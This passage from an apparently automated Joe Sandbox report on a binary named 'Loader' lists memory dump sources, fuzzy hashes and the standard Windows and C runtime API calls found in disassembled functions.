                                                                                                                      • Associated: 00000000.00000002.2178663529.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_190000_Loader.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: a4b5204e339133bf84330416a5308528dd9e98d6cb7a6fcb91640552a86da4e7
                                                                                                                      • Instruction ID: cae5c28952eedd864d10f8e7c95f9fe55d19148efead6a5c216919b66f455deb
                                                                                                                      • Opcode Fuzzy Hash: a4b5204e339133bf84330416a5308528dd9e98d6cb7a6fcb91640552a86da4e7
                                                                                                                      • Instruction Fuzzy Hash: FDD0A72160832946AB748E19E50097BFBF0EAC7B11F49956EFA82E3148D330EC41D2E9
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2178579174.00000000001BE000.00000004.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2178510148.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178530269.0000000000191000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178560198.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178615808.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178640844.0000000000215000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178663529.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_190000_Loader.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: bb8a45a0f10526e0d20210d5510e31f851a89abbb4eb8b5f4c554dc639634a30
                                                                                                                      • Instruction ID: 19355a9386c080a6bb533a2aa9030752ece54d13a0d7f7ff299c908fbe13c8c4
                                                                                                                      • Opcode Fuzzy Hash: bb8a45a0f10526e0d20210d5510e31f851a89abbb4eb8b5f4c554dc639634a30
                                                                                                                      • Instruction Fuzzy Hash: 94C04C79D48204AAD6049F00ED51B35B7799B87704F106429F549675A2D631D8109B1D
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2178530269.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2178510148.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178560198.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178579174.00000000001BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178615808.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178640844.0000000000215000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178663529.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_190000_Loader.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 352c58746815d872af4b3af9a2255c15039a5ed1f7fec551035c6ea349d431e8
                                                                                                                      • Instruction ID: 54639d2b2ae9d86cbb315baf5ec8b42acf824d9952c4ee313fa3ac52a3354805
                                                                                                                      • Opcode Fuzzy Hash: 352c58746815d872af4b3af9a2255c15039a5ed1f7fec551035c6ea349d431e8
                                                                                                                      • Instruction Fuzzy Hash: F7C08C3D01190046CEAA899082713A93364ABE7782FC0148CCC832B642C71EACC2D711
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2178579174.00000000001BE000.00000004.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2178510148.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178530269.0000000000191000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178560198.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178615808.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178640844.0000000000215000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178663529.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_190000_Loader.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 64024bcfd5821b9c218a5da5752519fb94f898f422c8eaf5205e93918c3d40fb
                                                                                                                      • Instruction ID: 23ac4f7aa94129611e337dd590c213858f2342a8c8eed4acfbb50f4d96c4c42d
                                                                                                                      • Opcode Fuzzy Hash: 64024bcfd5821b9c218a5da5752519fb94f898f422c8eaf5205e93918c3d40fb
                                                                                                                      • Instruction Fuzzy Hash: 8FB092A9C02424AA90122F103C069AEB0262D33208F892134E84632202A716DA1A809F
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2178579174.00000000001BE000.00000004.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2178510148.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178530269.0000000000191000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178560198.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178615808.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178640844.0000000000215000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178663529.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_190000_Loader.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: b7844b02a572a49535684d15743fa2b0f32e8e4bf9486e8a4cd92e739e29f041
                                                                                                                      • Instruction ID: d4b440e43fb62d22130e4f89ab47c8d9ce3a1a00332895032c063680befe7cda
                                                                                                                      • Opcode Fuzzy Hash: b7844b02a572a49535684d15743fa2b0f32e8e4bf9486e8a4cd92e739e29f041
                                                                                                                      • Instruction Fuzzy Hash: FCB09B74D44740D7C5006F316C8153DB1796F7B204F04357CB547331139B34D409451E
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2178579174.00000000001BE000.00000004.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2178510148.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178530269.0000000000191000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178560198.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178615808.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178640844.0000000000215000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178663529.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_190000_Loader.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 822fe4464400a46e8f72fc0999604445f7dd256f2e45a0655ff79b18d20bb17c
                                                                                                                      • Instruction ID: 24ee68e9cf35ca46f9a6c8df4466c534dd223dfd3ccd4b545064954b021d0c2e
                                                                                                                      • Opcode Fuzzy Hash: 822fe4464400a46e8f72fc0999604445f7dd256f2e45a0655ff79b18d20bb17c
                                                                                                                      • Instruction Fuzzy Hash: 72A00221C9C3049681045D005D00079F679598B512E697408D04C37601D230E905576D
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2178579174.00000000001BE000.00000004.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2178510148.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178530269.0000000000191000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178560198.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178615808.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178640844.0000000000215000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178663529.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_190000_Loader.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 2449faf6718c11823471f0839d5c75a09908f1381fbbdfabfc9eb93348329903
                                                                                                                      • Instruction ID: c91e9ea92e80b2859915e8bc43d97a3ab284b56197b9843f6884ef5b5e030273
                                                                                                                      • Opcode Fuzzy Hash: 2449faf6718c11823471f0839d5c75a09908f1381fbbdfabfc9eb93348329903
                                                                                                                      • Instruction Fuzzy Hash: 00A00224E982008A8249CF149850A70E2B9574F102F50792C800DF3563DA21D400860C
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2178579174.00000000001BE000.00000004.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2178510148.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178530269.0000000000191000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178560198.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178615808.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178640844.0000000000215000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178663529.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_190000_Loader.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 516ddb1a39b2c03d9e1b326386d71392f92e3583c1ec0344d3f8b719679b5916
                                                                                                                      • Instruction ID: 47513a061ab63e32abfa2e4f2e5d85209856904908b63c157151e5a83fe5ca1e
                                                                                                                      • Opcode Fuzzy Hash: 516ddb1a39b2c03d9e1b326386d71392f92e3583c1ec0344d3f8b719679b5916
                                                                                                                      • Instruction Fuzzy Hash: 19A00275D48115CB87104E449550174F339554B115F1D76518C08331124335F911458C
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2178530269.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2178510148.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178560198.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178579174.00000000001BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178615808.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178640844.0000000000215000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178663529.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_190000_Loader.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 0-3907804496
                                                                                                                      • Opcode ID: 30ae17a9c98b78930a4103a37ba2af49b74f639fa865806eaeb75c96fe9991ed
                                                                                                                      • Instruction ID: 60ec781d8513a021da3ce0247946aa7e5f4607e2bd4e71473f1a1595e10b6006
                                                                                                                      • Opcode Fuzzy Hash: 30ae17a9c98b78930a4103a37ba2af49b74f639fa865806eaeb75c96fe9991ed
                                                                                                                      • Instruction Fuzzy Hash: F0B12578A08245DFDF05DFA9DC84BAEBBB5AF96310F148159E404AB2D2CB349F41CB61
                                                                                                                      APIs
                                                                                                                      • type_info::operator==.LIBVCRUNTIME ref: 0019A2C7
                                                                                                                      • ___TypeMatch.LIBVCRUNTIME ref: 0019A3D5
                                                                                                                      • CallUnexpected.LIBVCRUNTIME ref: 0019A542
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2178530269.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2178510148.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178560198.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178579174.00000000001BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178615808.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178640844.0000000000215000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178663529.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_190000_Loader.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CallMatchTypeUnexpectedtype_info::operator==
                                                                                                                      • String ID: csm$csm$csm
                                                                                                                      • API String ID: 1206542248-393685449
                                                                                                                      • Opcode ID: 431a1a89ae57b6e7917a7b4f78c6a113fcb8d02859028e1342aa7ffe107b6cb6
                                                                                                                      • Instruction ID: 975ac11d143191924c6a25af9dc02371b117e8a37d8a22cb8c6deb27397bd708
                                                                                                                      • Opcode Fuzzy Hash: 431a1a89ae57b6e7917a7b4f78c6a113fcb8d02859028e1342aa7ffe107b6cb6
                                                                                                                      • Instruction Fuzzy Hash: 1CB1AD71800209EFCF25DFA8C8859AEBBB5FF24310F95419AE8006B212D771EE55CBD2
                                                                                                                      APIs
                                                                                                                      • FreeLibrary.KERNEL32(00000000,?,001A363C,?,?,00000000,00000000,?,?,001A37EA,00000021,FlsSetValue,001B69C8,001B69D0,00000000), ref: 001A35F0
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2178530269.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2178510148.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178560198.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178579174.00000000001BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178615808.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178640844.0000000000215000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178663529.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_190000_Loader.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: FreeLibrary
                                                                                                                      • String ID: api-ms-$ext-ms-
                                                                                                                      • API String ID: 3664257935-537541572
                                                                                                                      • Opcode ID: 954e9b5ebd0d443c6bfc165a5448fc314c5ae990cd43338a8f01d82632c60967
                                                                                                                      • Instruction ID: b17c03ff05ad46bd6f06b01abe7b54ad611bf4e1da037ff65d3798138731556d
                                                                                                                      • Opcode Fuzzy Hash: 954e9b5ebd0d443c6bfc165a5448fc314c5ae990cd43338a8f01d82632c60967
                                                                                                                      • Instruction Fuzzy Hash: 7A210A39E01210FBCB219B29EC49B9A7759AF53774F250215F935A7291EB30EF05CAD0
                                                                                                                      APIs
                                                                                                                      • __EH_prolog3.LIBCMT ref: 00193820
                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 0019382A
                                                                                                                      • int.LIBCPMT ref: 00193841
                                                                                                                        • Part of subcall function 001916DA: std::_Lockit::_Lockit.LIBCPMT ref: 001916EB
                                                                                                                        • Part of subcall function 001916DA: std::_Lockit::~_Lockit.LIBCPMT ref: 00191705
                                                                                                                      • codecvt.LIBCPMT ref: 00193864
                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 0019387B
                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 0019389B
                                                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 001938A8
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2178530269.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2178510148.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178560198.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178579174.00000000001BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178615808.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178640844.0000000000215000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178663529.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_190000_Loader.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registercodecvt
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2133458128-0
                                                                                                                      • Opcode ID: d596c8b56cc9fd85446bb08de09315fb678e42f0a98c2bfe023bc6972e4a3e0f
                                                                                                                      • Instruction ID: 1b182c57e126e512141ae7982472b96ecc5f41ef07da2caf866498b1f348f4cb
                                                                                                                      • Opcode Fuzzy Hash: d596c8b56cc9fd85446bb08de09315fb678e42f0a98c2bfe023bc6972e4a3e0f
                                                                                                                      • Instruction Fuzzy Hash: 5501D235D04116ABCF05EBA4C8456ADB7B1AFA4320F550508F825AB381DF74DF458B91
                                                                                                                      APIs
                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,?,?,?,00000001), ref: 001966C4
                                                                                                                      • MultiByteToWideChar.KERNEL32(00000001,00000001,00000000,?,00000000,00000000), ref: 0019672F
                                                                                                                      • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0019674C
                                                                                                                      • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0019678B
                                                                                                                      • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 001967EA
                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 0019680D
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2178530269.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2178510148.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178560198.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178579174.00000000001BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178615808.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178640844.0000000000215000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178663529.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_190000_Loader.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ByteCharMultiStringWide
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2829165498-0
                                                                                                                      • Opcode ID: 3c42810f0402d8cdfbfa6612ac12c8da37f89ab8d3bdaabd14faf034bfb2b275
                                                                                                                      • Instruction ID: fd4b63b902547f498e14e84cbed655e9666f95d68cb95f89ca96952b8a40a8a6
                                                                                                                      • Opcode Fuzzy Hash: 3c42810f0402d8cdfbfa6612ac12c8da37f89ab8d3bdaabd14faf034bfb2b275
                                                                                                                      • Instruction Fuzzy Hash: 6951AE72A0021AEFEF249FA1CC45FAB7BA9EF44794F254529F914A6150DB30DD50CBB0
                                                                                                                      APIs
                                                                                                                      • __EH_prolog3.LIBCMT ref: 00194F4A
                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00194F54
                                                                                                                      • int.LIBCPMT ref: 00194F6B
                                                                                                                        • Part of subcall function 001916DA: std::_Lockit::_Lockit.LIBCPMT ref: 001916EB
                                                                                                                        • Part of subcall function 001916DA: std::_Lockit::~_Lockit.LIBCPMT ref: 00191705
                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 00194FA5
                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00194FC5
                                                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 00194FD2
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2178530269.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2178510148.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178560198.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178579174.00000000001BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178615808.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178640844.0000000000215000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178663529.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_190000_Loader.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 55977855-0
                                                                                                                      • Opcode ID: b1bc25d12063d9bb8556d879209d8f1f5e00d0e0c9235c758c8e41be24456ea2
                                                                                                                      • Instruction ID: 071e3ce6b808f8853311382808dd58a7975ea228392fddc9d96cc7b245dd6070
                                                                                                                      • Opcode Fuzzy Hash: b1bc25d12063d9bb8556d879209d8f1f5e00d0e0c9235c758c8e41be24456ea2
                                                                                                                      • Instruction Fuzzy Hash: 19110371900219ABCF05EB68C846BAEB7F9AF64320F120509F425A7381DFB4EE418B91
                                                                                                                      APIs
                                                                                                                      • GetLastError.KERNEL32(?,?,00199E31,0019802B,001976E5), ref: 00199E48
                                                                                                                      • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00199E56
                                                                                                                      • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00199E6F
                                                                                                                      • SetLastError.KERNEL32(00000000,00199E31,0019802B,001976E5), ref: 00199EC1
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2178530269.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2178510148.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178560198.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178579174.00000000001BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178615808.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178640844.0000000000215000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178663529.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_190000_Loader.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorLastValue___vcrt_
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3852720340-0
                                                                                                                      • Opcode ID: 35717d709cf17fc26ad939ebd297f6fe03aed37d9f9f23a27a922b4b02a763e6
                                                                                                                      • Instruction ID: 2193068ae8c52f756d8395eed581381516a460575a4c5f5a83a64c50def2988e
                                                                                                                      • Opcode Fuzzy Hash: 35717d709cf17fc26ad939ebd297f6fe03aed37d9f9f23a27a922b4b02a763e6
                                                                                                                      • Instruction Fuzzy Hash: 9C01F73260D611EEAF257BB9BDC676B3A99FB11775720033DF121811F0EFA24C419141
                                                                                                                      APIs
                                                                                                                      • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,C0416D80,?,?,00000000,001B1F55,000000FF,?,001A0D3B,001A0E6B,?,001A0D0F,00000000), ref: 001A0DE0
                                                                                                                      • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 001A0DF2
                                                                                                                      • FreeLibrary.KERNEL32(00000000,?,?,00000000,001B1F55,000000FF,?,001A0D3B,001A0E6B,?,001A0D0F,00000000), ref: 001A0E14
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2178530269.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2178510148.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178560198.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178579174.00000000001BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178615808.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178640844.0000000000215000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178663529.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_190000_Loader.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                      • String ID: CorExitProcess$mscoree.dll
                                                                                                                      • API String ID: 4061214504-1276376045
                                                                                                                      • Opcode ID: e89c1bdbeb840ffa8339428395cfdedb46b2bd143029c754627bef18ddbcca0e
                                                                                                                      • Instruction ID: cee186e811f4aa49f3f914f4c84c7db2db0b1aa9b47607f9b2efcedff820af2a
                                                                                                                      • Opcode Fuzzy Hash: e89c1bdbeb840ffa8339428395cfdedb46b2bd143029c754627bef18ddbcca0e
                                                                                                                      • Instruction Fuzzy Hash: C701DB35540615FFDB129F44CC05BEEB7B8FF04710F000629F821E26D0DB749940CA90
                                                                                                                      APIs
                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 001924FB
                                                                                                                      • int.LIBCPMT ref: 0019250E
                                                                                                                        • Part of subcall function 001916DA: std::_Lockit::_Lockit.LIBCPMT ref: 001916EB
                                                                                                                        • Part of subcall function 001916DA: std::_Lockit::~_Lockit.LIBCPMT ref: 00191705
                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 00192541
